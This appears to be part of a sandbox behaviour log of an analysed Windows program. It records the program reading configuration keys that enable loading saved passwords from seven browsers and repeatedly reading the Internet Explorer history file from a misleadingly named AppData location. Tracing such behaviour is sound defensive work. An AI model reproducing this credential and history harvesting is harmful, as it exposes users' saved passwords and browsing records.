| Ini | Read | file_name_orig = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\viewcom.cfg, section_name = General, key_name = MarkOddEvenRows, default_value = 0 |
|
1 | |
| Ini | Read | file_name_orig = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\viewcom.cfg, section_name = General, key_name = ShowTimeInGMT, default_value = 0 |
|
1 | |
| Ini | Read | file_name_orig = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\viewcom.cfg, section_name = General, key_name = LoadPasswordsIE, default_value = 1 |
|
1 | |
| Ini | Read | file_name_orig = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\viewcom.cfg, section_name = General, key_name = LoadPasswordsFirefox, default_value = 1 |
|
1 | |
| Ini | Read | file_name_orig = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\viewcom.cfg, section_name = General, key_name = LoadPasswordsChrome, default_value = 1 |
|
1 | |
| Ini | Read | file_name_orig = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\viewcom.cfg, section_name = General, key_name = LoadPasswordsOpera, default_value = 1 |
|
1 | |
| Ini | Read | file_name_orig = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\viewcom.cfg, section_name = General, key_name = LoadPasswordsSafari, default_value = 1 |
|
1 | |
| Ini | Read | file_name_orig = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\viewcom.cfg, section_name = General, key_name = LoadPasswordsSeaMonkey, default_value = 1 |
|
1 | |
| Ini | Read | file_name_orig = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\viewcom.cfg, section_name = General, key_name = LoadPasswordsYandex, default_value = 1 |
|
1 | |
| Ini | Read | file_name_orig = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\viewcom.cfg, section_name = General, key_name = UseFirefoxProfileFolder, default_value = 0 |
|
1 | |
| Ini | Read | file_name_orig = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\viewcom.cfg, section_name = General, key_name = UseFirefoxInstallFolder, default_value = 0 |
|
1 | |
| Ini | Read | file_name_orig = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\viewcom.cfg, section_name = General, key_name = UseChromeProfileFolder, default_value = 0 |
|
1 | |
| Ini | Read | file_name_orig = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\viewcom.cfg, section_name = General, key_name = UseOperaPasswordFile, default_value = 0 |
|
1 | |
| Ini | Read | file_name_orig = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\viewcom.cfg, section_name = General, key_name = FirefoxProfileFolder |
|
1 | |
| Ini | Read | file_name_orig = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\viewcom.cfg, section_name = General, key_name = FirefoxInstallFolder |
|
1 | |
| Ini | Read | file_name_orig = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\viewcom.cfg, section_name = General, key_name = ChromeProfileFolder |
|
1 | |
| Ini | Read | file_name_orig = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\viewcom.cfg, section_name = General, key_name = OperaPasswordFile |
|
1 | |
| Ini | Read | file_name_orig = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\viewcom.cfg, section_name = General, key_name = SaveFileEncoeding, default_value = 0 |
|
1 | |
| Ini | Read | file_name_orig = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\viewcom.cfg, section_name = General, key_name = WinPos |
|
1 | |
| Ini | Read | file_name_orig = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\viewcom.cfg, section_name = General, key_name = Columns |
|
1 | |
| Ini | Read | file_name_orig = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\viewcom.cfg, section_name = General, key_name = Sort, default_value = 0 |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| File | Create | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 32, size_out = 32 |
|
1 | |
| File | Get Info | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, type = size |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
